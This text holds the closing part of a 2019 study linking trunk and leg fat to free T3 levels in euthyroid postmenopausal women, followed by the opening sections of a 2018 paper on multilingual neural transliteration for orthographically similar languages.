(19.5–24.0) 18.7 (17.0–20.9) 13.9 (10.9–16.4) <0.001 SBP (mmHg) 135 (122–148) 134 (122–145) 132 (123–144) 130 (119–141) 0.301 DBP (mmHg) 80 (74–88) 81 (74–87) 80 (74–86) 77 (71–82) 0.020 FPG (mmol/L) 5.7 (5.4–6.2) 5.7 (5.4–6.0) 5.8 (5.5–6.3) 5.6 (5.3–6.1) 0.044 2 h PG (mmol/L) 7.5 (5.8–9.7) 7.4 (5.9–8.8) 7.2 (5.8–8.3) 7.1 (5.7–8.7) 0.548 HbA1c (%) 5.7 (5.4–6.0) 5.6 (5.4–5.9) 5.6 (5.4–5.9) 5.6 (5.4–5.8) 0.614 FINS (mU/L) 8.8 (6.3–11.7) 7.6 (5.8–11.5) 8.3 (5.5–12.0) 6.5 (4.7–9.1) 0.001 HOMA-IR 2.2 (1.5–3.5) 2.0 (1.4–3.1) 2.1 (1.4–3.4) 1.6 (1.1–2.4) 0.001 TC (mmol/L) 5.3 ± 0.9 5.1 ± 0.9 5.2 ± 0.9 5.0 ± 0.8 0.102 TG (mmol/L) 1.6 (1.2–2.3) 1.4 (1.0–2.3) 1.5 (1.0–2.2) 1.2 (0.9–2.0) 0.105 HDL-c (mmol/L) 1.3 (1.1–1.5) 1.2 (1.1–1.4) 1.3 (1.1–1.4) 1.4 (1.1–1.6) 0.018 LDL-c (mmol/L) 3.3 ± 0.7 3.2 ± 0.8 3.2 ± 0.7 3.0 ± 0.7 0.051 E2 (pmol/L) 99.1 (80.8–125.7) 113.8 (91.8–128.5) 95.5 (84.4–110.1) 99.1 (80.8–121.2) 0.009 Women n 124 126 123 124 – Age (years) 60 (57–63) 61 (56–65) 61 (57–64) 60 (57–63) 0.355 BMI (kg/m2) 25.0 (23.1–27.0) 23.4 (22.0–25.1) 22.5 (21.0–24.4) 20.2 (18.7–21.5) <0.001 Total FM (kg) 23.0 (20.0–27.0) 19.6 (17.5–22.9) 17.0 (14.9–20.0) 12.4 (10.7–14.5) <0.001 Total fat% 36.5 (34.1–39.0) 32.7 (30.9–35.5) 30.4 (28.3–33.4) 24.8 (22.1–26.7) <0.001 SBP (mmHg) 127 (115–140) 128 (118–140) 125 (116–137) 121 (110–132) 0.002 DBP (mmHg) 76 (71–83) 76 (70–81) 74 (68–82) 73 (68–80) 0.080 FPG (mmol/L) 5.8 (5.5–6.2) 5.7 (5.4–6.2) 5.7 (5.4–6.0) 5.5 (5.1–6.0) <0.001 2hPG (mmol/L) 7.1 (6.1–9.2) 7.1 (5.6–9.0) 7.2 (6.1–8.5) 6.8 (5.6–8.1) 0.274 HbA1c (%) 5.7 (5.5–6.1) 5.8 (5.6–6.0) 5.7 (5.5–6.0) 5.6 (5.4–5.9) 0.049 FINS (mU/L) 11.3 (8.5–14.3) 10.2 (7.3–14.1) 8.3 (6.8–10.5) 6.3 (4.8–7.7) <0.001 HOMA-IR 2.8 (2.2–3.9) 2.6 (1.8–3.8) 2.1 (1.7–2.7) 1.6 (1.2–2.0) <0.001 TC (mmol/L) 5.7 ± 0.9 5.9 ± 1.0 5.6 ± 0.9 5.8 ± 1.0 0.974 TG (mmol/L) 1.4 (1.0–1.9) 1.4 (1.0–2.0) 1.3 (0.9–1.7) 1.0 (0.8–1.4) <0.001 HDL-c (mmol/L) 1.4 (1.2–1.7) 1.4 (1.3–1.7) 1.6 (1.3–1.7) 1.8 (1.5–2.0) <0.001 LDL-c (mmol/L) 3.6 ± 0.8 3.6 ± 0.9 3.4 ± 0.8 3.4 ± 0.9 0.073 E2 (pmol/L) 36.7 (18.4–47.7) 38.5 (18.4–47.7) 18.4 (18.4–44.1) 18.4 (18.4–40.4) 0.002 Data were means ± standard deviation or medians (interquartile range). Q1 < 0.58, Q2 0.58–0.63, Q3 0.64–0.73 and Q4 > 0.73 for men; Q1 < 0.64, Q2 0.64–0.70, Q3 0.71–0.80 and Q4 > 0.80 for women. 2 h PG, 2-h plasma glucose; BMI, body mass index; DBP, diastolic blood pressure; fat%, fat percentage; E2, estradiol; FINS, fasting insulin; FM, fat mass; FPG, fasting plasma glucose; HbA1c, glycated hemoglobin A1c; HDL-c, high-density lipoprotein cholesterol; HOMA-IR, homeostasis model assessment- insulin resistance; LDL-c, low-density lipoprotein cholesterol; LTR, leg fat mass to trunk fat mass ratio; SBP, systolic blood pressure; TC, total cholesterol; TG, triglyceride. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:21PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com X Nie, Y Xu and et al. Fat distribution and thyroid hormones 14298:10 fat and preperitoneal fat through ultrasonography in 194 euthyroid postmenopausal women. They found that FT3 was positively associated with subcutaneous fat and preperitoneal fat (18). sBIA directly measures the bioelectrical impedance of the trunk, arms and legs. Subsequently, FM and fat% of different fat depots can be calculated based on the bioelectrical impedance. The segmental fat distribution measured by sBIA was highly consistent with that measured by dual energy X-ray absorptiometry (r ≥ 0.95, P < 0.001) (9). Our findings in trunk fat were in consistent with Lambrinoudaki`s results. However, we further found a significant and negative relationship between FT3 and leg fat, while arm fat was not related to thyroid hormones. Moreover, our study found that there were no relationships between segmental fat distribution and thyroid hormones in men. In this study, the LTR was calculated to reflect a tendency of fat accumulating in the legs rather than the trunk. In one previous study, Gavi et al. also calculated the limb fat to trunk fat ratio. Limb fat specifically referred to leg fat in their study. They found that the limb fat to trunk fat ratio was negatively related to insulin resistance and TG and positively related to HDL-c in a middle-aged and elderly population (19). The middle-aged and elderly population, especially postmenopausal women, is at high risk of metabolic and cardiovascular diseases (20). In our study, we also chose this high-risk population as study subjects. We found that the LTR was negatively related to FT3 in postmenopausal women. The correlation coefficient of total FM related to FT3 was weaker than that of trunk FM related to FT3 in the partial correlation analysis, and a negative relationship was found between the LTR and FT3. Thus, we conjectured that leg fat and trunk fat might be confounding factors of one another. In the multivariate linear regression analysis, trunk fat and leg fat parameters were mutually adjusted. We found that trunk fat parameters were positively related to FT3 and that leg fat parameters were negatively related to FT3. The result suggested that leg fat might alleviate the adverse effect between trunk fat and increased FT3. A sex difference existed in the relationship between segmental fat distribution and FT3 in our study, which might because women had a greater propensity to store fat in the lower body driven by the effects of sex hormones (21, 22, 23). Figure 1 Thyroid hormones with LTR quartiles. FT3 decreased significantly as LTR quartiles increased in women (P for trend = 0.004), but this trend was not significant in men. FT4 and TSH were not significantly changed as LTR quartiles increased in both men and women. Figure 2 Partial correlation analysis of total FM, trunk FM, LTR and FT3 in women. Age and BMI were adjusted. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:21PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com X Nie, Y Xu and et al. Fat distribution and thyroid hormones 1430 PB–8 8:10 Because FT3 promotes adipose decomposition and increases the basal metabolic rate (4), a high level of FT3 in the obese population was considered a compensatory effect under the condition of energy surplus according to the conventional view (6). However, in recent years, some studies found that a high level of FT3 within the reference range is related to an increased risk of NAFLD (7, 8). In the Lifelines cohort study, the risk of NAFLD increased 1.34-fold for each 1 standard deviation increase in FT3 in the euthyroid population (7). In a euthyroid Chinese population, a high level of FT3 was an independent predictive factor of NAFLD (8). Roef et al. found that FT3 was positively related to multiple adverse metabolic and cardiovascular risk factors in a euthyroid middle-aged population (5). Although there is still a lack of evidence from prospective studies, a high level of FT3 within the reference range may be a potential adverse metabolic marker. Trunk fat and leg fat have exhibited inverse relationships with type 2 diabetes, cardiovascular disease and multiple metabolic and cardiovascular risk factors (3, 10, 11, 24, 25). There are large discrepancies between trunk fat and leg fat in the uptake and release of free fatty acids (26). Trunk fat is more sensitive to lipolysis stimulus. Leg fat has a lower lipolysis rate and is the ‘storage pool’ of circulating ectopic lipids. Leg fat can stabilize free fatty acids that are released by trunk fat and thus decrease lipotoxicity (21). Trunk fat and leg fat also differ in the release of adipokines and inflammatory factors (11, 27, 28); however, few studies have explored the relationships between adipokines and FT3. Further research is needed to clarify the mechanisms underlying the correlations between trunk fat, leg fat and FT3. Our study has some limitations. First, the study subjects were middle-aged and elderly; thus, the results may not be generalizable to other age groups. Second, the present study did not fully consider some information such as luteinizing hormone, follicle- stimulating hormone and selective estrogen receptor modulators. Third, due to the nature of the cross-sectional study, causality cannot be deduced. Further prospective studies are needed to elucidate the causal relationship between segmental fat distribution and FT3. Conclusions In euthyroid postmenopausal women, trunk fat is positively related to FT3, while leg fat is negatively related to FT3. Our findings supported that a high level of FT3 within the reference range was related to adverse fat distribution. Further studies are needed to clarify the causality and underlying mechanisms. Declaration of interest The authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. Table 2 Multivariate linear regression for thyroid hormones in women. Independent variables FT3 FT4 TSH Model 1 Total Fat mass 0.021 (0.402) 0.021 (0.407) −0.037 (−0.693) Fat% 0.050 (0.976) −0.003 (−0.063) −0.053 (−1.019) Trunk Fat mass 0.042 (0.818) 0.031 (0.597) −0.041 (−0.783) Fat% 0.056 (1.111) −0.005 (−0.102) −0.050 (−0.968) Arm Fat mass −0.003 (−0.063) 0.008 (0.160) −0.022 (−0.428) Fat% 0.004 (0.069) −0.019 (−0.376) −0.025 (−0.489) Leg Fat mass −0.019 (−0.382) 0.003 (0.050) −0.030 (−0.572) Fat% −0.026 (−0.530) −0.048 (−0.970) −0.032 (−0.634) Leg fat mass to trunk fat mass ratio −0.116 (−2.464)a −0.032 (−0.667) 0.073 (1.505) Model 2 Trunk Fat mass 0.303 (2.628)b 0.146 (1.244) −0.072 (−0.609) fat% 0.218 (2.582)a 0.097 (1.130) −0.067 (−0.768) Leg Fat mass −0.285 (−2.525)a −0.126 (−1.092) 0.034 (0.291) fat% −0.195 (−2.388)a −0.124 (−1.486) 0.020 (0.236) Data were expressed as standardized β (t). aP < 0.05, bP < 0.01. Model 1 was adjusted for age, homeostasis model assessment-insulin resistance, diastolic blood pressure, low-density lipoprotein cholesterol and estradiol. In model 2, all confounding factors included in model 1 were adjusted, in addition that trunk fat mass was adjusted for leg fat mass, trunk fat% was adjusted for leg fat%, leg fat mass was adjusted for trunk fat mass, leg fat% was adjusted for trunk fat%. fat%, fat percentage; FT3, free triiodothyronine; FT4, free thyroxine; TSH, thyroid-stimulating hormone. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:21PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com X Nie, Y Xu and et al. Fat distribution and thyroid hormones 14318:10 Funding This work was supported by the National Key R&D Program of China (2016YFA0502003). References 1 Dale CE, Fatemifar G, Palmer TM, White J, Prieto-Merino D, Zabaneh D, Engmann JEL, Shah T, Wong A, Warren HR, et al. Causal associations of adiposity and body fat distribution with coronary heart disease, stroke subtypes, and type 2 diabetes mellitus: a Mendelian randomization analysis. Circulation 2017 135 2373–2388. (https://doi.org/10.1161/CIRCULATIONAHA.116.026560) 2 Emdin CA, Khera AV, Natarajan P, Klarin D, Zekavat SM, Hsiao AJ & Kathiresan S. Genetic association of waist-to-hip ratio with cardiometabolic traits, type 2 diabetes, and coronary heart disease. JAMA 2017 317 626–634. (https://doi.org/10.1001/jama.2016.21042) 3 Vasan SK, Osmond C, Canoy D, Christodoulides C, Neville MJ, Di Gravio C, Fall CHD & Karpe F. Comparison of regional fat measurements by dual-energy X-ray absorptiometry and conventional anthropometry and their association with markers of diabetes and cardiovascular disease risk. International Journal of Obesity 2018 42 850–857. (https://doi.org/10.1038/ijo.2017.289) 4 Mullur R, Liu YY & Brent GA. Thyroid hormone regulation of metabolism. Physiological Reviews 2014 94 355–382. (https://doi. org/10.1152/physrev.00030.2013) 5 Roef GL, Rietzschel ER, Van Daele CM, Taes YE, De Buyzere ML, Gillebert TC & Kaufman JM. Triiodothyronine and free thyroxine levels are differentially associated with metabolic profile and adiposity-related cardiovascular risk markers in euthyroid middle- aged subjects. Thyroid 2014 24 223–231. (https://doi.org/10.1089/ thy.2013.0314) 6 De Pergola G, Ciampolillo A, Paolotti S, Trerotoli P & Giorgino R. Free triiodothyronine and thyroid stimulating hormone are directly associated with waist circumference, independently of insulin resistance, metabolic parameters and blood pressure in overweight and obese women. Clinical Endocrinology 2007 67 265–269. (https:// doi.org/10.1111/j.1365-2265.2007.02874.x) 7 van den Berg EH, van Tienhoven-Wind LJ, Amini M, Schreuder TC, Faber KN, Blokzijl H & Dullaart RP. Higher free triiodothyronine is associated with non-alcoholic fatty liver disease in euthyroid subjects: the lifelines cohort study. Metabolism: Clinical and Experimental 2017 67 62–71. (https://doi.org/10.1016/j. metabol.2016.11.002) 8 Liu G, Zheng X, Guan L, Jiang Z, Lin H, Jiang Q, Zhang N, Zhang Y, Zhang X, Yu C, et al. Free triiodothyronine levels are positively associated with non-alcoholic fatty liver disease in euthyroid middle- aged subjects. Endocrine Research 2015 40 188–193. (https://doi.org/ 10.3109/07435800.2014.987399) 9 Pietrobelli A, Rubiano F, St-Onge MP & Heymsfield SB. New bioimpedance analysis system: improved phenotyping with whole-body analysis. European Journal of Clinical Nutrition 2004 58 1479–1484. (https://doi.org/10.1038/sj.ejcn.1601993) 10 Snijder MB, Dekker JM, Visser M, Bouter LM, Stehouwer CD, Yudkin JS, Heine RJ, Nijpels G, Seidell JC & Hoorn study. Trunk fat and leg fat have independent and opposite associations with fasting and postload glucose levels: the Hoorn study. Diabetes Care 2004 27 372–377. (https://doi.org/10.2337/diacare.27.2.372) 11 Wu H, Qi Q, Yu Z, Sun Q, Wang J, Franco OH, Sun L, Li H, Liu Y, Hu FB, et al. Independent and opposite associations of trunk and leg fat depots with adipokines, inflammatory markers, and metabolic syndrome in middle-aged and older Chinese men and women. Journal of Clinical Endocrinology & Metabolism 2010 95 4389–4398. (https://doi.org/10.1210/jc.2010-0181) 12 Sanchez-Lopez M, Ortega FB, Moya-Martinez P, Lopez-Martinez S, Ortiz-Galeano I, Gomez-Marcos MA, Sjostrom M & Martinez- Vizcaino V. Leg fat might be more protective than arm fat in relation to lipid profile. European Journal of Nutrition 2013 52 489–495. (https://doi.org/10.1007/s00394-012-0350-4) 13 Hu G, Bouchard C, Bray GA, Greenway FL, Johnson WD, Newton RL, Jr, Ravussin E, Ryan DH & Katzmarzyk PT. Trunk versus extremity adiposity and cardiometabolic risk factors in white and African American adults. Diabetes Care 2011 34 1415–1418. (https://doi. org/10.2337/dc10-2019) 14 National Collaborating Centre for Women’s and Children’s Health. Menopause: Full guideline. Clinical guideline: methods, evidence and recommendations. London, UK: National Institute for Health and Care Excellence (UK), 2015. (available at: https://www.nice.org.uk/ guidance/ng23/evidence/full-guideline-559549261) 15 Xu Y, Ma X, Shen Y, Gu C, Tang J & Bao Y. Role of hyperglycaemia in the relationship between serum osteocalcin levels and relative skeletal muscle index. Clinical Nutrition 2018 [epub]. (https://doi. org/10.1016/j.clnu.2018.11.025) 16 Matthews DR, Hosker JP, Rudenski AS, Naylor BA, Treacher DF & Turner RC. Homeostasis model assessment: insulin resistance and beta-cell function from fasting plasma glucose and insulin concentrations in man. Diabetologia 1985 28 412–419. (https://doi. org/10.1007/bf00280883) 17 Taylor PN, Richmond R, Davies N, Sayers A, Stevenson K, Woltersdorf W, Taylor A, Groom A, Northstone K, Ring S, et al. Paradoxical relationship between body mass index and thyroid hormone levels: a study using Mendelian randomization. Journal of Clinical Endocrinology & Metabolism 2016 101 730–738. (https://doi. org/10.1210/jc.2015-3505) 18 Lambrinoudaki I, Armeni E, Rizos D, Georgiopoulos G, Athanasouli F, Triantafyllou N, Panoulis K, Augoulea A, Creatsa M, Alexandrou A, et al. Indices of adiposity and thyroid hormones in euthyroid postmenopausal women. European Journal of Endocrinology 2015 173 237–245. (https://doi.org/10.1530/EJE-15-0141) 19 Gavi S, Feiner JJ, Melendez MM, Mynarcik DC, Gelato MC & McNurlan MA. Limb fat to trunk fat ratio in elderly persons is a strong determinant of insulin resistance and adiponectin levels. Journals of Gerontology. Series A, Biological Sciences and Medical Sciences 2007 62 997–1001. (https://doi.org/10.1093/ gerona/62.9.997) 20 Auro K, Joensuu A, Fischer K, Kettunen J, Salo P, Mattsson H, Niironen M, Kaprio J, Eriksson JG, Lehtimaki T, et al. A metabolic view on menopause and ageing. Nature Communications 2014 5 4708. (https://doi.org/10.1038/ncomms5708) 21 Tchkonia T, Thomou T, Zhu Y, Karagiannides I, Pothoulakis C, Jensen MD & Kirkland JL. Mechanisms and metabolic implications of regional differences among fat depots. Cell Metabolism 2013 17 644–656. (https://doi.org/10.1016/j.cmet.2013.03.008) 22 Koutsari C, Ali AH, Mundi MS & Jensen MD. Storage of circulating free fatty acid in adipose tissue of postabsorptive humans: quantitative measures and implications for body fat distribution. Diabetes 2011 60 2032–2040. (https://doi. org/10.2337/db11-0154) 23 Rask-Andersen M, Karlsson T, Ek WE & Johansson Å. Genome-wide association study of body fat distribution identifies adiposity loci and sex-specific genetic effects. Nature Communications 2019 10 339. (https://doi.org/10.1038/s41467-018-08000-4) 24 Yano Y, Vongpatanasin W, Ayers C, Turer A, Chandra A, Carnethon MR, Greenland P, de Lemos JA & Neeland IJ. Regional fat distribution and blood pressure level and variability: the Dallas Heart study. Hypertension 2016 68 576–583. (https://doi.org/10.1161/ HYPERTENSIONAHA.116.07876) 25 Lee M, Choh AC, Demerath EW, Towne B, Siervogel RM & Czerwinski SA. Associations between trunk, leg and total body This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:21PM via free access https://doi.org/10.1161/CIRCULATIONAHA.116.026560 https://doi.org/10.1001/jama.2016.21042 https://doi.org/10.1038/ijo.2017.289 https://doi.org/10.1152/physrev.00030.2013 https://doi.org/10.1152/physrev.00030.2013 https://doi.org/10.1089/thy.2013.0314 https://doi.org/10.1089/thy.2013.0314 https://doi.org/10.1111/j.1365-2265.2007.02874.x https://doi.org/10.1111/j.1365-2265.2007.02874.x https://doi.org/10.1016/j.metabol.2016.11.002 https://doi.org/10.1016/j.metabol.2016.11.002 https://doi.org/10.3109/07435800.2014.987399 https://doi.org/10.3109/07435800.2014.987399 https://doi.org/10.1038/sj.ejcn.1601993 https://doi.org/10.2337/diacare.27.2.372 https://doi.org/10.1210/jc.2010-0181 https://doi.org/10.1007/s00394-012-0350-4 https://doi.org/10.2337/dc10-2019 https://doi.org/10.2337/dc10-2019 https://www.nice.org.uk/guidance/ng23/evidence/full-guideline-559549261 https://www.nice.org.uk/guidance/ng23/evidence/full-guideline-559549261 https://doi.org/10.1016/j.clnu.2018.11.025 https://doi.org/10.1016/j.clnu.2018.11.025 https://doi.org/10.1007/bf00280883 https://doi.org/10.1007/bf00280883 https://doi.org/10.1210/jc.2015-3505 https://doi.org/10.1210/jc.2015-3505 https://doi.org/10.1530/EJE-15-0141 https://doi.org/10.1093/gerona/62.9.997 https://doi.org/10.1093/gerona/62.9.997 https://doi.org/10.1038/ncomms5708 https://doi.org/10.1016/j.cmet.2013.03.008 https://doi.org/10.2337/db11-0154 https://doi.org/10.2337/db11-0154 https://doi.org/10.1038/s41467-018-08000-4 https://doi.org/10.1161/HYPERTENSIONAHA.116.07876 https://doi.org/10.1161/HYPERTENSIONAHA.116.07876 https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com X Nie, Y Xu and et al. Fat distribution and thyroid hormones 1432 PB–8 8:10 adiposity with arterial stiffness. American Journal of Hypertension 2012 25 1131–1137. (https://doi.org/10.1038/ajh.2012.92) 26 Ebbert JO & Jensen MD. Fat depots, free fatty acids, and dyslipidemia. Nutrients 2013 5 498–508. (https://doi.org/10.3390/nu5020498) 27 Pinnick KE, Neville MJ, Fielding BA, Frayn KN, Karpe F & Hodson L. Gluteofemoral adipose tissue plays a major role in production of the lipokine palmitoleate in humans. Diabetes 2012 61 1399–1403. (https://doi.org/10.2337/db11-1810) 28 Antony B, Jones G, Stannus O, Blizzard L & Ding C. Body fat predicts an increase and limb muscle strength predicts a decrease in leptin in older adults over 2.6 years. Clinical Endocrinology 2013 79 652–660. (https://doi.org/10.1111/cen.12101) Received in final form 16 September 2019 Accepted 26 September 2019 Accepted Preprint published online 26 September 2019 This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:21PM via free access https://doi.org/10.1038/ajh.2012.92 https://doi.org/10.3390/nu5020498 https://doi.org/10.2337/db11-1810 https://doi.org/10.1111/cen.12101 https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com Abstract Introduction Materials and methods Study population Anthropometric and biochemical assessments Measurement of segmental fat distribution Statistical analysis Results Clinical characteristics of the study participants Changes of thyroid hormones in LTR quartiles Partial correlation analysis of segmental fat parameters and thyroid hormones Multivariate linear regression analysis for thyroid hormones Discussion Conclusions Declaration of interest Funding References work_nw3etn3etra45jwazg6txw2oly ---- Leveraging Orthographic Similarity for Multilingual Neural Transliteration Anoop Kunchukuttan1, Mitesh Khapra2, Gurneet Singh2, Pushpak Bhattacharyya1 {anoopk,pb}@cse.iitb.ac.in, {miteshk,garry}@cse.iitm.ac.in 1Department of Computer Science & Engineering Indian Institute of Technology Bombay, Mumbai, India. 2Department of Computer Science & Engineering Indian Institute of Technology Madras, Chennai, India. Abstract We address the task of joint training of translit- eration models for multiple language pairs (multilingual transliteration). This is an in- stance of multitask learning, where individ- ual tasks (language pairs) benefit from shar- ing knowledge with related tasks. We fo- cus on transliteration involving related tasks i.e., languages sharing writing systems and phonetic properties (orthographically similar languages). We propose a modified neural encoder-decoder model that maximizes pa- rameter sharing across language pairs in order to effectively leverage orthographic similar- ity. We show that multilingual transliteration significantly outperforms bilingual translitera- tion in different scenarios (average increase of 58% across a variety of languages we experi- mented with). We also show that multilingual transliteration models can generalize well to languages/language pairs not encountered dur- ing training and hence perform well on the ze- roshot transliteration task. We show that fur- ther improvements can be achieved by using phonetic feature input. 1 Introduction Transliteration is a key building block for multi- lingual and cross-lingual NLP since it is essential for (i) handling of names in applications like ma- chine translation (MT) and cross-lingual information retrieval (CLIR), and (ii) user-friendly input meth- ods. The transliteration problem has been exten- sively studied in literature for a variety of language pairs (Karimi et al., 2011). Previous work has looked at the most natural setup - training on a single lan- guage pair. However, no prior work exists on jointly training multiple language pairs (referred to as mul- tilingual transliteration henceforth). Multilingual transliteration can be seen as an in- stance of multi-task learning, where training each language pair constitutes a task. Multi-task learning works best when the tasks are related to each other, so sharing of knowledge across tasks is beneficial. Thus, multilingual transliteration can be beneficial, if the languages involved are related. We identify such a natural and practically useful scenario: mul- tilingual transliteration involving languages that are related on account of sharing writing systems and phonetic properties. We refer to such languages as orthographically similar languages. We say that two languages are orthographically similar if they have: (i) highly overlapping phoneme sets, (ii) mutually compatible orthographic systems, and (iii) similar grapheme to phoneme mappings. For instance, Indo-Aryan languages largely share the same set of phonemes. They use different In- dic scripts, but correspondences can be established between equivalent characters across scripts. For example, the Hindi (Devanagari script) character क (ka) maps to the Bengali ক (ka) which stands for the consonant sound (IPA: k). The grapheme to phoneme mapping is also consistent for equiva- lent characters. We can identify two major sources of orthographic similarity: (a) genetic relationship between languages (groups like Romance, Slavic, Indo-Aryan and Turkic languages) (b) prolonged contact between languages over a long period of time, e.g. convergence in phonological properties of the Indo-Aryan and Dravidian languages in the In- dian subcontinent, most strikingly retroflex conso- nants (Subbārāo, 2012). Dravidian and Indo-Aryan languages use compatible Indic scripts. Another 303 Transactions of the Association for Computational Linguistics, vol. 6, pp. 303–316, 2018. Action Editor: Mona Diab. Submission batch: 8/2017; Revision batch: 12/2017; Published 5/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. example is the Nigerian linguistic area comprising Niger-Congo languages like Yoruba, Fula, Igbo and Afro-Asiatic languages like Hausa (the most widely spoken language in Nigeria). Most languages use the Latin script (some use Ajani, a modified Arabic script). In this work, we explore multilingual translit- eration involving orthographically similar lan- guages. To the best of our knowledge, ours is the first work to address the task of multilingual transliteration. We propose that transliteration in- volving orthographically similar languages is a sce- nario where multilingual training can be very ben- eficial. Since these languages share phonological properties, the transliteration tasks are clearly re- lated. We can utilize this relatedness by sharing the vocabulary across all related languages. The grapheme-to-grapheme correspondences enable vo- cabulary sharing. It helps transfer knowledge across languages while training. For instance, if the net- work learns that the English character l maps to the Hindi character ल (la), it would also learn that l maps to the corresponding Kannada character ಲ (la). Data from both Kannada and Hindi datasets will reinforce the evidence for this mapping. A sim- ilar argument can be made when both the source and target languages are related. The grapheme- grapheme correspondences arise from the underly- ing phoneme-phoneme correspondences. The con- sistent grapheme-phoneme mappings help establish the grapheme-grapheme correspondences. Due to the utilization of language relatedness, the benefits that are typically ascribed to multi-task learning (Caruana, 1997) may also apply to mul- tilingual transliteration. Since related languages share characters, it is possible to share representa- tions across languages. This may help to generalize transliteration models since joint training provides an inductive bias which prefers models that are better at transliterating multiple language pairs. The train- ing may also benefit from implicit data augmenta- tion since training data from multiple language pairs is available. From the perspective of a single lan- guage pair, data from other language pairs can be seen as additional (noisy) training data. This is par- ticularly beneficial in low-resource scenarios. Our work adds to the increasing body of work investigating multilingual training for various NLP tasks like POS tagging (Gillick et al., 2016), NER (Yang et al., 2016; Rudramurthy et al., 2016) and machine translation (Dong et al., 2015; Firat et al., 2016; Lee et al., 2017; Zoph et al., 2016; Johnson et al., 2017) with a view to learn models that gen- eralize across languages and make effective use of scarce training data. The following are the contributions of our work: (1) We propose a compact neural encoder-decoder model for multilingual transliteration, that is de- signed to ensure maximum sharing of parameters across languages while providing room for learning language-specific parameters. This allows greater sharing of knowledge across language pairs by lever- aging orthographic similarity. We empirically show that models with maximal parameter sharing are ben- eficial, without increasing the model size. (2) We show that multilingual transliteration ex- hibits significant improvement in transliteration ac- curacy over bilingual transliteration in different sce- narios (average improvement of 58%). Our results are backed by extensive experiments on 8 languages across 2 orthographically similar language groups. (3) We perform an error analysis which suggests that representations learnt by the encoder in multilin- gual transliteration can reduce transliteration ambi- guities. Multilingual transliteration also seems bet- ter at learning canonical transliterations instead of alternative, phonetically equivalent transliterations. These could explain the improved performance of multilingual transliteration. (4) We explore the zeroshot transliteration task (i.e., transliteration between languages/language pairs not seen during training) and show that our multi- lingual model can generalize well to unseen lan- guages/language pairs. Notably, the zeroshot transliteration results mostly outperform the direct bilingual transliteration model. (5) We have richer phonetic information at our dis- posal for some related languages. We propose a novel method to incorporate phonetic input in the model and show that it provides modest gains for multilingual transliteration. The rest of the paper is organized as follows. Sec- tion 2 discusses related work. Section 3 formalizes the multilingual transliteration task and describes our proposed solution. Sections 4 and 5 discuss the ex- perimental setup, results and analysis. Section 6 dis- 304 cusses various zeroshot transliteration scenarios, our solutions and the results of experiments. Section 7 discusses incorporation of phonetic information for multilingual transliteration. Section 8 concludes the work and discusses future directions. 2 Related Work General Transliteration Methods Previous work on transliteration has focused on the scenario of bilingual training. Until recently, the best- performing solutions were discriminative statistical transliteration methods based on phrase-based statis- tical machine translation (Bisani and Ney, 2008; Ji- ampojamarn et al., 2008; Jiampojamarn et al., 2009; Finch and Sumita, 2010). Recent work has explored bilingual neural transliteration using the standard neural encoder-decoder architecture (with attention mechanism) (Bahdanau et al., 2015) or its adap- tions (Finch et al., 2015; Finch et al., 2016). Using target bidirectional LSTM with model ensembling, Finch et al. (2016) have outperformed the state-of- the-art phrase-based systems on the NEWS shared task datasets. On the other hand, we focus on mul- tilingual transliteration with the encoder-decoder ar- chitecture or its adaptations. The two strands of work are obviously complimentary. Multilinguality and Transliteration To the best of our knowledge, ours is the first work on multi- lingual transliteration. Jagarlamudi and Daumé III (2012) have proposed a method for transliteration mining (given a name and candidate transliterations, identify the correct transliteration) across multiple languages using grapheme to IPA mappings. Note that their model cannot generate transliterations; it can only rank candidates. Some literature mentions multilingual transliteration (Surana and Singh, 2008; He et al., 2017; Prakash, 2012; Pouliquen et al., 2005) or multilingual transliteration mining (Kle- mentiev and Roth, 2006; Yoon et al., 2007). In these cases, however, multilingual refer to methods which work with multiple languages (as opposed to joint training - the sense of the word multilingual as we use it). Multilingual Translation Our work on multilin- gual transliteration is motivated by recently pro- posed multilingual neural machine translation archi- tectures (Firat et al., 2016). Broadly, these proposals can be categorized into two groups. One group con- sists of architectures that specialize parts of the net- work for particular languages: specialized encoders (Zoph et al., 2016), decoders (Dong et al., 2015) or both (Firat et al., 2016). 